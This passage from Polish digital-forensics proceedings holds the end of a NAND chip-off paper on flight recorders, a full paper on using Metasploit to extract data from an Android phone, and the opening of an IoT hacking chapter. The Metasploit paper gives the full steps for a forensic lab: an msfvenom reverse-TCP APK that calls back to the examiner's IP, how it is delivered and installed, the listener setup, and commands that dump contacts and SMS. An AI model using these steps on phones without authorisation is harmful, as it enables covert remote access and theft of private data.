Dysk SSD, jak każde urządzenie z pamięcią flash, wyposażone jest w
pamięć NAND i kontroler. W omawianym przypadku jest to pamięć firmy Kioxia
(Toshiba) TH58TEG8H2HBA-89 i kontroler firmy Innodisk model (rodzina modeli)
ID107.
NAND W dzisiejszych czasach najbardziej popularnym nośnikiem danych jest
pamięć NAND (flash). Pamięć taką znajdziemy w wielu urządzeniach począwszy od
USB flash drive (pendrive), poprzez telefony, tablety, routery, tysiące urządzeń typu smart
home devices (inteligentny dom), karty SD, kończąc na wcześniej wspomnianych
dyskach SSD. Architektura pamięci NAND na drodze ewolucji przechodziła liczne
etapy innowacji. Najstarszym rodzajem pamięci jest pamięć SLC (single-level cell), gdzie
w jednej komórce zapisywany jest jeden bit danych. Pamięć ta jest najdroższym rodzajem
pamięci NAND. Cechuje się jednak największą trwałością spośród wszystkich
dostępnych. Stosowana jest aktualnie w urządzeniach specjalistycznych, w których
trwałość zapisu danych jest elementem kluczowym. Kolejnym etapem ewolucji było
powstanie MLC (multi-level cell), gdzie w jednej komórce zapisywane są dwa bity.
Wprowadzenie tej technologii pozwoliło na uzyskanie kości pamięci o większych
pojemnościach oraz obniżyło koszty produkcji. Pamięć ta jest tańsza i może mieć większą
pojemność od SLC, lecz kosztem trwałości zapisanych danych jak i długości życia.
Najpopularniejszym aktualnie rodzajem pamięci jest TLC (triple-level cell) gdzie na
jedną komórkę przypadają trzy bity. NAND o tej architekturze potrafi przechowywać
znacznie większe ilości danych, niestety pamięć ta jest bardziej podatna na błędy bitowe.
Jest też mniej żywotna niż MLC, nie wspominając o SLC, które potrafi zapewnić sto razy
więcej operacji zapisu/odczytu w porównaniu z TLC.[5][6]
Rys. 2 Żywotność pamięci NAND w zależności od architektury
Na rynku wciąż można spotkać pamięć QLC (quad-level cell), lecz
awaryjność tej ostatniej najprawdopodobniej jest powodem stopniowego odchodzenia od
139
stosowania tej technologii. Jednakże ciężko jest przewidzieć jakie rozwiązania będą
wprowadzane przez producentów w przyszłości.
Pomimo tego, że architektura pamięci NAND cały czas ewoluuje, na
chipie pamięci wykonywane są zawsze trzy podstawowe operacje:
• Odczyt danych
• Zapis danych
• Usuwanie danych
Kontroler Zapis/Odczyt pamięci NAND odbywa się podobnie na wszystkich
urządzeniach flash, czyli za pomocą odpowiednich protokołów, aczkolwiek urządzenia
mogą posiadać różne interfejsy. W tym przypadku jest to złącze SATA, ale rozróżnia się
także interfejsy USB i tym podobne. We wszystkich przypadkach potrzebny jest element,
który będzie odpowiednio zarządzał pamięcią NAND, jak i tłumaczył dane wejściowe na
dane, które docelowo znajdą się w pamięci w postaci naładowanych komórek NAND.
Funkcje te we wszystkich urządzeniach flash pełni kontroler. Na rynku można spotkać
kontrolery wielu producentów i pomimo różnic pomiędzy nimi, główne zadania jakie
wykonuje kontroler są niemal zawsze takie same. Podstawowe funkcje kontrolera to:
• Transformacja danych - dane wejściowe wpływające do urządzenia są
modyfikowane, po czym zostają zapisywane w pamięci NAND. Podczas
odczytu operacja taka jest odwracana.
• Wyrównanie zużycia - komórki pamięci NAND mają ograniczoną liczbę
zapisów, więc pamięć musi być wykorzystywana równomiernie, aby urządzenie
działało jak najdłużej.
• Optymalizacja danych - dane muszą być łatwo dostępne, ale muszą być także
odpowiednio zabezpieczone. Dane znajdujące się w komórkach NAND są
niczym innym jak ładunkami elektrycznymi. Aby uchronić pamięć przed
migracją ładunków, która może być spowodowana poprzez różnice pola
elektrostatycznego pomiędzy komórkami, aktualnie produkowane kontrolery
używają operacji bitowej XOR, przy użyciu odpowiedniego klucza. Operacja
XOR sprawia, że finalny zapis w pamięci ma wysoki poziom entropii, dzięki
czemu różnice potencjałów są niższe, więc ryzyko degradacji jest również
niższe.
• Korekcja błędów bitowych - błędy bitowe są nieodzownie związane z zapisem
pamięci. Aby ich uniknąć, stosowane są algorytmy korekcji.
W starszych urządzeniach był to Hamming code i Reed-Solomon, natomiast w
większości aktualnie produkowanych urządzeń, jak i w badanym przypadku jest
to BCH. Na rynku obecne są również urządzenia używające kodu LDPC.
• Alokacja danych - kontrolery zazwyczaj działają na blokach logicznych, lecz
aby odczyt i zapis był jak najszybszy, kontroler budując blok logiczny alokuje
dane jednocześnie w dwóch plane’ach pamięci NAND, jak i pomiędzy chipami,
bądź kryształami.
140
Rys. 3 Operacja XOR wykonywana przez kontroler
Odzyskiwanie danych bezpośrednio z pamięci NAND
Jak już wcześniej wspomniano czarna skrzynka przechodzi szereg testów.
Testy uważane są za zaliczone, kiedy po ich wykonaniu moduł pamięci (dysk SSD) nie
ulegnie zniszczeniu i można pozyskać z niego dane. Niestety nie ma możliwości
przeprowadzania takich testów, które byłyby w stanie dokładnie odwzorować wszystkie
zdarzenia, jakie mogą spotkać rejestrator lotu. Często okazuje się, że po katastrofie
zniszczenia są na tyle rozległe, że pozyskanie danych jest niemożliwe. W przypadku
uszkodzenia modułu pamięci istnieje jednak możliwość odzyskania danych pod
warunkiem, że pamięć NAND nie ulegnie zniszczeniu. Z uszkodzonego dysku należy
wyodrębnić chip pamięci NAND i przy pomocy specjalistycznego sprzętu jak i
oprogramowania pozyskać dane, które są na nim zapisane. Następnie należy odtworzyć
wszystkie algorytmy, których używał kontroler podczas zapisu danych.[2][3][4] Do
wykonania tych czynności zostało wykorzystane oprogramowanie Visual NAND
Reconstructor (VNR) oraz adapter i czytnik NAND firmy Rusolut.
Odczyt pamięci
• Pozyskanie pamięci NAND z urządzenia: Kość pamięci znajduje się na PCB
(ang. Printed Circuit Board) urządzenia i może być dodatkowo zabezpieczona
żywicą epoksydową bądź inną podobną substancją. Wylutowanie pamięci wiąże
się z ryzykiem przegrzania chipa, co może nieodwracalnie uszkodzić zapisane
na nim dane. Najmniej inwazyjnym sposobem pozyskania chipa jest
wylutowanie go za pomocą stacji na podczerwień przy parametrach Tmax =
240°C (Tdelta ~ 3°C/s). Pozyskany chip pamięci jest chipem typu BGA132 i jest
to często spotykany rodzaj kości w urządzeniach pamięci masowej.
• Dobór konfiguracji i odczyt pamięci: Po wyodrębnieniu kości pamięci możliwy
jest odczyt pamięci NAND, przy czym przed przystąpieniem do rzeczonej
czynności, należy odczytać NAND ID (identyfikator pamięci). Na podstawie
numeru ID można dobrać odpowiednie parametry odczytu. Badana pamięć
posiadała przypisany nr ID: 0x98DEA1327A. Dwa pierwsze znaki oznaczają
141
producenta kości NAND. ID zaczynające się od 0x98 są przypisane pamięciom
Toshiba. Ponadto w tym przypadku zostały odczytane parametry JEDEC.
Parametry te podają szereg informacji o pamięci. Jedną z tych informacji jest
podana liczba bitów na jedną komórkę „Number bits per cell 0x1”. Jeden bit na
komórkę oznacza, że NAND posiada architekturę SLC, co jest kluczowym
parametrem dla stabilności zapisanych danych.
Zdj. 5 Parametry JEDEC, adapter, reader oraz odczyt pamięci.
Rekonstrukcja obrazu logicznego
Uzyskany zrzut (plik binarny pozyskany z NAND) należy poddać
szeregowi transformacji, które w pełni odtworzą pracę kontrolera, który to dokonał zapisu
danych na analizowanej pamięci. Wszystkie operacje przeprowadzane są przy pomocy
oprogramowania VNR. Wykonywane są kolejno:
• Nałożenie klucza XOR - po dopasowaniu odpowiedniego klucza możliwe było
wykonanie operacji XOR. Finalnie pozwoliło to uzyskać dane, które były
przesyłane do urządzenia.
• Korekcja ECC - przy znalezieniu odpowiednich parametrów można dokonać
korekcji w celu usunięcia błędów bitowych
• Concatenate, Pair i Unite - te trzy operacje wykonywane są w celu odbudowy
bloków logicznych jakimi posługiwał się kontroler.
• Markers Table - kolejność bloków logicznych w fizycznych adresach jest różna
od kolejności odczytu. Przy pomocy markerów w mapie bitowej, zwanych LBN
(Logical Block Number), odtworzona jest kolejność odczytu bloku.
• Element Logical image - element wyodrębnia obszar danych z każdego bloku w
kolejności ustalonej w poprzednim elemencie markers table, co finalnie daje
obraz logiczny i możliwość uzyskania w pełni zrekonstruowanych danych.
142
Zdj. 6 Rekonstrukcja obrazu logicznego przy użyciu programu VNR.
Uzyskany w ten sposób obraz logiczny można zapisać w postaci bitmapy,
a następnie plik ten otworzyć przez oprogramowanie producenta. Należy jednak pamiętać,
że bezpośrednio w mapie bitowej można znaleźć wiele przydatnych informacji, między
innymi wartości ciśnienia oraz długość i szerokość geograficzną.
Zdj. 7 Parametry lotu znalezione w zrekonstruowanym obrazie logicznym.
143
Podsumowanie
Rejestratory lotu są niezwykle wytrzymałymi urządzeniami. Pomimo
wielu uszkodzeń można pozyskać zapisane w nich dane. Należy jednak brać pod uwagę
także to, że najbardziej chroniona część - moduł pamięci może zostać uszkodzona.
W przypadku uszkodzenia modułu pamięci istnieje szansa na odzyskanie
danych. Dane zapisywane są docelowo w pamięci NAND i w przypadku, kiedy moduł
ulegnie nieodwracalnemu uszkodzeniu, a chip pamięci nadal działa to przy pomocy
specjalistycznego oprogramowania VNR możliwa jest rekonstrukcja obrazu logicznego
urządzenia. Obraz ten z kolei może być poddany analizie przez oprogramowanie
producenta czarnej skrzynki, co finalnie pozwala na odzyskanie ważnych danych.
Podziękowania
Serdeczne podziękowania dla firmy ETEP za udostępnioną dokumentację oraz
dostarczenie urządzeń do badań.
Bibliografia
1. M. Gmurek, S. Sheremetov, I. Loskutov “Ekstrakcja dowodów z urządzeń IoT z
wykorzystaniem metody Chip-off" w Przestępczość Teleinformatyczna 2022,
ISSN 1898-3189
2. ETEP, “Emergency Data Recovery Manual D.T.MUX Sentinel” “Crash
Survivability Test Report (CSTR) (Fixed Recording Systems) Crash Protected
Memory” https:// http://www.etep.com
3. Open NAND Flash Interface (ONFI) Specification
https://www.onfi.org/specifications
4. A. Fukami, S. Sheremetov, F. Regazzoni, Z. Geradts and C. De Laat,
"Experimental Evaluation of eMMC Data Recovery," in IEEE Transactions on
Information Forensics and Security, vol. 17, pp. 2074-2083, 2022, doi:
10.1109/TIFS.2022.3176187.
5. Yixin Luo, Yu Cai, Saugata Ghose, Jongmoo Choi, Onur Mutlu, Improving
NAND Flash Memory Lifetime with Write-hotness Aware Retention
Management https://ieeexplore.ieee.org/document/7208284
6. A. Fukami, S. Ghose, Y.Luo, Y. Cai, O.Mutlu “Improving the reliability of chip-
off forensic analysis of NAND flash memory devices”, in “Przestępczość
Teleinformatyczna 2018”, ISSN 1898-3189
144
METASPLOIT JAKO ALTERNATYWNE NARZĘDZIE WSPIERAJĄCE
INFORMATYKĘ ŚLEDCZĄ PLATFORM MOBILNYCH
METASPLOIT AS AN ALTERNATIVE TOOL TO SUPPORT COMPUTER
FORENSICS OF MOBILE PLATFORM
mgr inż. Kamil KOŁODZIEJCZYK
1
Centralne Biuro Zwalczania Cyberprzestępczości
Streszczenie
Praca omawia zastosowanie narzędzi pakietu Metasploit w informatyce śledczej
do pozyskiwania danych ze smartfonów. Prezentowane jest generowanie kodu
operacyjnego, transfer agenta na urządzenie mobilne oraz zdalny dostęp i pobieranie
danych. Podkreślana jest także konieczność zachowania etyki i legalności działań.
Przedstawiając Metasploita jako wartościowe narzędzie, zwracana jest uwaga na
konieczność świadomego i legalnego wykorzystania go w celach śledczych.
Słowa kluczowe: cyfrowa informatyka śledcza, metasploit, ekstrakcja danych z urządzeń
mobilnych, zdalny dostęp
Summary
The research discusses the application of tools within the Metasploit framework in digital
forensics for extracting data from smartphones. It covers the generation of operational
code, transferring the agent to mobile devices, remote access, and data retrieval. Emphasis
is placed on the importance of ethical and legal conduct. Presenting Metasploit as a
valuable tool, attention is drawn to the need for conscious and lawful use, particularly in
forensic purposes.
Keywords: digital forensics, metasploit framework, smartphone data extraction, remote
access
Wstęp Wraz z dynamicznym rozwojem technologii równolegle rośnie znaczenie
informatyki śledczej w prowadzeniu dochodzeń kryminalnych, a także analizie
incydentów związanych z cyberprzestępczością. Istotną gałęzią tej sztuki są platformy
mobilne, takie jak np. smartfony oraz tablety, które stają się kluczowym źródłem danych.
Wg. raportu „The State of Mobile Internet Connectivity 2023” w 2022 roku użytkownicy
telefonów komórkowych korzystają z nich 5 godzin dziennie. Dalej autorzy raportu
wskazują, że jest to wzrost o 3% w porównaniu do roku 2021
2
. W rezultacie urządzenia
ta stają się na tyle osobiste, że są kluczowym źródłem danych w procesach śledczych.
1
Wydział Informatyki Śledczej, Zarząd w Warszawie, Centralne Biuro Zwalczania Cyberprzestępczości,
kamil.kolodziejczyk@cbzc.policja.gov.pl, ORCID: 0000-0001-7443-6403
2
Matthew Shanahan, Klvin Bahia, The State of Mobile Internet Connectivity 2023, GSMA, 2023.
145
Złożoność tych urządzeń oraz ich systemów operacyjnych wymaga
wykorzystywania zaawansowanych narzędzi w celu efektywnego pozyskiwania
informacji. Na ten moment sam posiadam około 4 tysiące zdjęć w galerii mojego
smartfonu, 900 kontaktów oraz 2000 połączeń zgromadzonych w ciągu kilku ostatnich
lat korzystania z tego urządzenia.
Informatycy śledczy pracujący w służbach, biegli sądowi
wykwalifikowani specjaliści na rynku prywatnym, posiadają szereg dedykowanych
komercyjnych narzędzi wspierających proces gromadzenia danych z urządzeń mobilnych.
Niniejsze opracowanie koncentruje się na zastosowaniu pakietu Metasploit (potężnego
narzędzia służącego, m.in. do prowadzenia testów penetracyjnych) w dziecinie
informatyki śledczej w kontekście pozyskiwania danych z telefonów komórkowych. W
pracy tej omówiony zostanie jeden z przypadków, w których zastosowanie tego narzędzia
może w znaczący sposób wspomóc pracę informatyka śledczego.
Przygotowanie środowiska symulacyjnego
W celu prezentacji wykorzystania tytułowego narzędzia przygotowane
zostało środowisko składające się z następujących urządzeń:
− Telefon Samsung Galaxy J5 (SM-J510FN) – smartfon posiadający uszkodzone
gniazdo ładowania. Tym samym podłączenie urządzenia do komputera celem
uzyskania dostępu do danych, a dalej wykorzystania standardowego
oprogramowania informatyki śledczej nie jest możliwe. Konieczne jest
zastosowanie alternatywnego rozwiązania. W tej symulacji telefon pozostaje
odblokowany tj. znany jest jego kod PIN.
− Komputer służbowy z systemem Kali Linux oraz zainstalowanym pakietem
Metasploit.
− Router bezprzewodowy TP-Link TL-WR740N – urządzenie pozwoli przygotować
wyizolowaną sieć, w której będą pracowały pozostałe urządzenia. Konfiguracja
routera pozostaje domyślna i tworzy środowisko sieciowe w zasięgu adresacji IP:
192.168.1.0/24 (rys 1).
W przedmiotowej symulacji zadaniem informatyka śledczego jest
wykonanie ekstrakcji danych z pamięci urządzenia posiłkując się oprogramowaniem
Metasploit. W tym celu w systemie operacyjnym Kali Linux zostanie wygenerowany
dedykowany kod operacyjny pełniący rolę „agenta” na badanym urządzeniu. Do tego
posłuży narzędzie Msfvenom wchodzące w skład pakietu Metasploit. Jest to
wszechstronny generator przeznaczony do tworzenia dedykowanych ładunków
operacyjnych, które mogą być wykorzystywane w procedurach penetracyjnych
wykorzystujących luki w zabezpieczeniach systemów w trakcie cyfrowej analizy śledczej.
146
Rysunek 14. Topologia sieci dla prowadzonej symulacji
Dalej wygenerowany skrypt operacyjny zostanie dostarczony na
urządzenie przeznaczone do badań, które uprzednio zostanie podłączone od sieci lokalnej,
w której również pracował będzie komputer informatyka śledczego.
Następnie skrypt operacyjny zostanie uruchomiony na urządzeniu
docelowym i pozwoli na zdalny dostęp do jego danych. Aplikacja Meterpreter jest
kolejnym narzędziem pakietu Metasploit, które wykorzystywane jest do zdalnego
sterowania systemem w celu wykonywania różnorodnych zadań. Takimi działaniami
może być zdalne uruchamianie poleceń, przesyłanie plików, wykonywanie skryptów,
przechwytywanie obrazu ekranu oraz wiele innych funkcji.
Generowanie kodu operacyjnego
Do wygenerowania kodu operacyjnego w systemie Kali Linux posłuży
polecenie: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104
LPORT=4444 R > /home/kali/Desktop/agent.apk.
Poniżej objaśnienie poszczególnych składowych komendy:
• msfvenom – wywołuje narzędzie służące do generowania kodu operacyjnego.
• -p android/meterpreter/reverse_tcp – w tym miejscu określany jest rodzaj ładunku,
jaki zostanie wykorzystany przez agenta. Ten konkretny wykorzystuje
tzw. „reverse TCP”, czyli technikę polegającą na ustanowieniu połączenia z hosta
odległego do hosta lokalnego. Czyli upraszczając to urządzenie, na którym jest agent
będzie inicjowało połączenie do komputera informatyka śledczego.
• LHOST=192.168.1.104 – ta wartość to adres IP, do którego agent będzie
podejmował próby nawiązania połączenia. W tym wypadku jest to adres IP
komputera informatyka śledczego.
• LPORT=4444 – numer portu, na który będą kierowane próby nawiązania
połączenia. Istotne jest aby przy „nasłuchiwaniu” przychodzących sesji połączeń
wskazać tożsamy port.
• R – opcja ta oznacza, że plik zostanie zapisany w formie binarnej.
• > /home/kali/Desktop/agent.apk – w tym miejscu jest wskazywana ścieżka
urządzenia informatyka śledczego, gdzie zostanie zapisany plik .apk o wskazanej
nazwie.
147
Rysunek 15. Reverse TCP
Wynikiem działania tego polecenia powstanie plik o nazwie agent.apk
zawierający kod operacyjny pozwalający na ustanowienie zdalnego połączenia
urządzenia pracującego na systemie Android z komputerem informatyka śledczego.
Transfer agenta do pamięci urządzenia i uruchamianie
Kolejnym krokiem jest przekazanie pliku do urządzenia mobilnego. Z
uwagi na uszkodzone gniazdo ładowania nawiązanie fizycznego połączenia
przewodowego nie jest możliwe. W tej sytuacji istnieją inne drogi przesłania agenta, m.in:
− Bezprzewodowe metody przesłania danych:
▪ Bluetooth – warunkiem zastosowania tej metody jest działający moduł; bluetooth,
który pozwoli na sparowanie z innym urządzeniem i przesłanie pliku za pomocą
tej funkcji.
▪ WiFi Direct – jeśli urządzenia obsługują tę technologię,
pozwala to na bezpośrednie połączenie między nimi.
▪ Aplikacje do udostępniania plików – np. Sharelt, Xender, Send Anywhere.
− Karta pamięci – jeśli urządzenie posiada gniazdo karty pamięci, może być to jeden
ze sposobów przekazania pliku do urządzenia. Wtedy wystarczy plik wgrać na
kartę i włożyć ją do telefonu.
− Chmura – wykorzystanie chmury takiej jak np. Google Drive, Dropbox
czy OneDrive. To rozwiązanie jednak wymaga podłączenia urządzenia do sieci
Internet co przynieść może pewne konsekwencje w postaci utraty danych.
− Serwer HTTP – prostym sposobem jest także uruchomienie serwera HTTP,
który będzie serwował zawartość katalogu. Idealnym do tego może być
wykorzystanie modułu http.server w języku Python3. W niniejszym opracowaniu
zostanie wykorzystana ta metoda.
Do zastosowania metody polegającej na utworzeniu serwera HTTP
konieczne jest aby telefon pracował w tej samej sieci lokalnej, na której będzie
serwowana zawartość katalogu z agentem. W celu uruchomienia serwera należy przejść
do katalogu, w którym znajduje się przedmiotowy plik, a następnie użyć polecenia:
python3 -m http.server 8080, które zostało objaśnione poniżej:
• python3 – rozpoczyna polecenie informując system, że będzie wykorzystywany
interpreter języka Python w wersji 3.
148
• -m – flaga ta wskazuje, że moduł zostanie użyty jako polecenie w wierszu poleceń.
• http.server – uruchamia ww. moduł wbudowany w bibliotekę języka Python. Jest
to prosty serwer http do obsługi żądań HTTP.
• 8080 – jest to numer portu, na którym serwer będzie „nasłuchiwał” żądań http.
Podsumowując, polecenie to uruchomi prosty serwer HTTP na porcie
8080 wykorzystując język Python. Umożliwi to serwowanie plików znajdujących się w
bieżącym katalogu. W tym momencie pozostało już wyłącznie użyć przeglądarki w
telefonie aby uzyskać dostęp do plików poprzez adres: http://192.168.1.104:8080.
Zrzut ekranu 1. Dostęp do serwera HTTP z plikiem agenta
Zrzut ekranu 2. Serwowanie zawartości katalogu /home/kali/Desktop z plikiem agent.apk
Po pomyślnym przekazaniu agenta do urządzenia, przed jego instalacją
wymagane jest włączenie opcji instalacji aplikacji z nieznanych/niezaufanych źródeł
innych niż np. Sklep Play. Aby przejść do lokalizacji tego ustawienia w telefonie Samsung
Galaxy J5 należy kolejno: wejść do ustawień, przejść do zakładki „Ekran blokady i
zabezpieczenia” i tam zaznaczyć opcje: „Nieznane źródła”. W innych wersjach systemu
android opcja ta znajdować się może w innych lokalizacjach. Najczęściej powyższe
ustawienie znaleźć można w opcjach deweloperskich telefonu. Aby włączyć opcje
deweloperskie należy odnaleźć zakładkę, w której prezentowane są podstawowe
informacje o oprogramowaniu i nacisnąć 5 razy pole: „Numer wersji”. Po tej czynności
bezpośrednio w oknie ustawień bądź zakładce „ustawienia dodatkowe” pojawią się tzw.
„opcje deweloperskie”. W nich powinna znajdować się funkcja zezwalająca na instalację
aplikacji z niezaufanych źródeł, którą należy zaznaczyć. Teraz już wystarczy
zainstalować aplikację i przyznać jej wszelkie uprawnienia.
Zestawianie sesji Metrepreter z agentem na urządzeniu mobilnym
Agent został umieszczony na badanym urządzeniu, został zainstalowany
oraz nadano mu uprawnienia. Wobec powyższego nadszedł moment aby zestawić
połączenie z komputerem informatyka śledczego. Do tego wykorzystany zostanie
149
„nasłuchiwacz” (ang. listener), którego zadaniem jest oczekiwanie na maszynie
informatyka śledczego na przychodzące połączenia
3
. W tym celu wykorzystany zostanie
Meterpreter z pakietu Metasploit, którego należy uruchomić poleceniem msfconsole
wpisanym w terminal systemu Kali Linux. Następnie poleceniem use
exploit/multi/handler wybierany jest moduł służący do nasłuchiwania połączeń
przychodzących oraz do ich obsługi. Kolejny krok to uzupełnienie modułu odpowiednimi
parametrami takimi jak:
• set payload android/meterpreter/reverse_tcp – ustawia ładunek zaprojektowany do
zestawiania zdalnych połączeń z urządzeniem z systemem Android. Jest to ten sam
rodzaj ładunku, jaki był wskazywany przy generowaniu kodu operacyjnego.
• set lhost 192.168.1.104 – ustawia adres IP komputera informatyka śledczego. Musi
być tożsamy z adresem wskazanym przy tworzeniu kodu operacyjnego.
• set lport 4444 – w tym miejscu wskazywany jest numer portu,
na którym Meterpreter „nasłuchiwał” będzie połączeń przychodzących.
Ponownie wartość ta musi być identyczna z tą wskazywaną przy generowaniu
agenta.
• exploit – uruchamia nasłuchiwanie.
W tym momencie należy uruchomić zainstalowaną aplikację w telefonie.
Jeśli wszystko zostało poprawianie skonfigurowane agent nawiąże sesję z modułem
Meterpreter. Prezentuje to zrzut ekranu numer 2.
Zrzut ekranu 3. Pomyślne nawiązanie sesji agenta z Metreprterem
Po poprawnym nawiązaniu sesji pozostaje przejść do etapu akwizycji
danych z urządzenia mobilnego.
Pobieranie danych
W przypadku pomyślnego nawiązania połączenia kolejne kroki to już
obsługa urządzenia poprzez agenta za pomocą poleceń modułu Meterpreter. Jedną z
pierwszych komend będzie: sysinfo pozwalające na wyświetlenie podstawowych
informacji o urządzeniu, a przede wszystkim na potwierdzenie poprawności nawiązania
połączenia (wynik zaprezentowany na zrzucie ekranu numer 4). Kolejne to localtime,
pozwalające na odczytanie aktualnego czasu na urządzeniu (zrzut ekranu numer 5). Jest
to istotne polecenie z punktu widzenia Informatyki Śledczej.
3
David Kennedy i in, Metasploit. Przewodnik po testach penetracyjnych, HELION S.A, 2013.
150
Zrzut ekranu 4. Polecenie sysinfo
Zrzut ekranu 5. Polecenie localtime
Posiadając dostęp do urządzenia czas na rozpoczęcie ekstrakcji danych z
urządzenia. Istnieje wiele podejść do przeprowadzenia tych czynności. Od wykorzystania
gotowych funkcji modułu Meterpreter po uzyskiwanie danych poprzez utworzenie
powłoki interaktywnej tzw. „shell”. W niniejszym opracowaniu wykorzystane zostaną
domyślne narzędzia modułu Meterpreter.
W celu pobrania listy kontaktów zapisanych w urządzeniu skorzystać
można z funkcji: dump_contacts. Należy pamiętać, że wszelkie dane jakie program
pobiera zapisywane są w katalogu, z którego został uruchomiony Metasploit, czyli w tym
wypadku /home/kali/Desktop. W wyniku tego polecenia narzędzie pobrało listę
kontaktów, która zapisana została w postaci pliku contacts_dump_20231201132559.txt.
Zrzut ekranu 6. Funkcja dump_contacts
Zrzut ekranu 7. Fragment pliku z pobranymi kontaktami
Kolejny krok to pobranie wiadomości SMS poleceniem: dump_sms.
Analogicznie do poprzedniego polecenia zostaną pobrane na komputer wiadomości SMS.
W tym przypadku do pliku: sms_dump_20231201134214.txt.
151
Zrzut ekranu 8. Fragment pliku zawierający wiadomości SMS
Do wyświetlenia aplikacji zainstalowanych na urządzeniu służy
narzędzie: app_list. W efekcie zostanie wyświetlona lista aplikacji wraz z informacjami
o pakiecie, uruchomieniu, oraz określeniu czy jest to aplikacja systemowa.
Zrzut ekranu 9. Fragment listy aplikacji zainstalowanych na urządzeniu android
Kolejne dane jakie możemy pozyskać z badanego telefonu to pliki
graficzne, wideo, audio, pdf, itp. Do tego służy polecenie download. Tym samym aby
pobrać pliki z lokalizacji: /sdcard/DCIM/Screenshots/ należy użyć polecenia: download
/sdcard/DCIM/Screenshots/. Wszystkie pliki zostaną pobrane na urządzenie informatyka
śledczego. Istnieje też możliwość ograniczenia pobrania do jednego pliku. W tej sytuacji
należy ścieżkę docelową w poleceniu uzupełnić o nawę pliku.
Zrzut ekranu 10. Pobranie zawartości katalogu z badanego urządzenia
Dla tak pobranych plików można następnie policzyć sumy kontrolne
MD5, SHA1 za pomocą polecenia md5sum * lub sha1sum *.
152
Zrzut ekranu 11. Hashowanie pobranych plików
Warto nadmienić, że Meterpreter posiada wbudowaną funkcję
pozwalająca na liczenie sum kontrolnych plików znajdujących się w pamięci badanego
urządzenia. Służy do tego polecenie checksum md5 lub checksum sha1. Jednak posiada
ono dość uciążliwe ograniczenie polegające na tym, że jest w stanie obliczać sumę dla
jednego pliku na raz. Nie jest możliwe „hashowanie” całej zawartości katalogu.
Przykładem takiego obliczania sumy kontrolnej pliku na badanym urządzeniu będzie
polecenie: checksum md5 /sdcard/DCIM/Screenshots/Screenshot_20231015-191150.jpg.
Zrzut ekranu 12. Obliczanie sumy kontrolnej MD5 za pomocą narzędzia Meterpreter
Z uwagi na powyższe wydaje się być lepszym rozwiązaniem policzanie
sum po pobraniu plików na komputer. Tym bardziej, że wartości przedstawione na zrzucie
kranu numer12 (przed pobraniem plików) są tożsame z tymi wyliczonymi po pobraniu
(zrzut ekranu numer 11).
Inną dość pomocną funkcją jest wykonywanie zrzutów ekranu urządzenia
lub nagrywanie ekranu za pomocą narzędzia screenshot oraz screenshare. Jednak w tym
wypadku nie jest to możliwe, ponieważ został wykorzystany ładunek agenta bez
interfejsu użytkownika. Uniemożliwia to wykonywanie tej czynności. Istnieje jednak
kilka możliwych rozwiązań uzależnionych od modelu badanego urządzenia oraz wersji
systemu android. Pierwsza to wykorzystanie aplikacji posiadającej interfejs graficzny.
Np. poprzez zainfekowanie takiej aplikacji kodem operacyjnym i umieszczenie jej na
badanym urządzeniu. Rozwiązanie to nie będzie omawiane w niniejszym opracowaniu z
uwagi na możliwe przekroczenie granic wykorzystania tej metody służące do realizacji
celów wykraczających poza aspekty informatyki śledczej. Druga to migrowanie do
innego procesu posiadającego interfejs graficzny. Jednak to rozwiązanie wymagać może
eskalacji uprawnień. Na tej wersji systemu android nie jest to możliwe do realizacji bez
„rootowania” urządzenia, czyli uzyskiwania dostępu do uprawnień administratora (root)
w systemie operacyjnym Android.
153
Po zakończeniu czynności wystarczy odinstalować aplikację z urządzenia
oraz przywrócić ustawienia dotyczące instalacji aplikacji z niezaufanych źródeł do
domyślnych wartości.
Warto zauważyć, że omówione w niniejszym opracowaniu funkcje i
możliwości narzędzia Metasploit oraz Meterpreter stanowią jedynie fragment tego, co
oferuje w kontekście informatyki śledczej. Istnieje wiele innych zaawansowanych funkcji
i technik, które nie zostały tu opisane, a które mogą znacznie rozszerzyć zakres i
skuteczność tego narzędzia. Podsumowując, Meterpreter oferuje bogaty zestaw narzędzi,
które mogą być znacząco rozszerzone i dostosowane do specyficznych wymagań i celów
w dziedzinie informatyki śledczej, co czyni go niezwykle wartościowym narzędziem w
arsenale każdego specjalisty ds. bezpieczeństwa i informatyki śledczej.
Podsumowanie
Metasploit to potężne narzędzie, które znajduje swoje zastosowanie w
wielu dziedzinach informatyki, a w tym także w informatyce śledczej, wspierając prace
specjalistów w tej dziedzinie. Jego zaawansowane funkcje pozwalają na przeprowadzanie
skomplikowanych testów penetracyjnych, analizę luk w zabezpieczeniach oraz zbieranie
istotnych danych, co może być nieocenione w śledztwach cyfrowych.
Jednocześnie, Metasploit posiada również liczne funkcje, które mogą
przekształcić go w narzędzie niebezpieczne i nieetyczne, jeśli zostanie użyte w
niewłaściwy sposób. Jego zdolność do eksploatacji luk bezpieczeństwa, zdalnego
kontrolowania systemów i zbierania wrażliwych danych, może prowadzić do naruszenia
prywatności, nieautoryzowanego dostępu do danych i systemów, jeśli zostanie użyte bez
odpowiednich zezwoleń i poza ramami legalnych działań.
Z tego powodu, korzystanie z Metasploit wymaga nie tylko umiejętności
technicznych, ale również ścisłego przestrzegania zasad etycznych i prawnych. Jest to
narzędzie, które powinno być stosowane wyłącznie w odpowiednich, legalnych
kontekstach, takich jak etyczny hacking, testy penetracyjne zatwierdzone przez
właścicieli systemów, oraz działania w ramach ścigania przestępczości cyfrowej z
odpowiednimi uprawnieniami.
Bibliografia
1. Matthew Shanahan, Klvin Bahia, The State of Mobile Internet Connectivity
2023, GSMA, 2023.
2. David Kennedy i in., Metasploit. Przewodnik po testach penetracyjnych,
HELION S.A, 2013.
154
HACKING USING (IN)EXPENSIVE HARDWARE
dr Zbigniew JAKUBOWSKI, Grzegorz MARCZAK
Compendium Educational Center
Streszczenie
Niniejszy rozdział ma kilka celów do osiągnięcia. Pierwszym bardzo istotnym jest
dostrzeżenie potencjału i zagrożeń związanym ze Światem IoT i technologiami mającymi
w nim zastosowanie. Urządzenia IoT mogą grać zarówno rolę ofiary, jak i atakującego.
Mogą pełnić również ważną rolę dowodową. Technologia IoT wymusiła obniżenie cen
sprzętu i znaczne zwiększenie jego dostępności rynkowej. Kolejnym problemem było to,
że w wielu przypadkach rezygnowano z dochodzenia, ponieważ sprzęt, konieczny do
analizy, był poza zasięgiem możliwości ekonomicznych przeciętnego klienta. Mam
nadzieję, że uda nam się Państwa przekonać, że można wiele osiągnąć nawet przy niskim
budżecie.
Słowa kluczowe: IoT, (Internet of Things), hacking, analiza śledcza, analiza transmisji
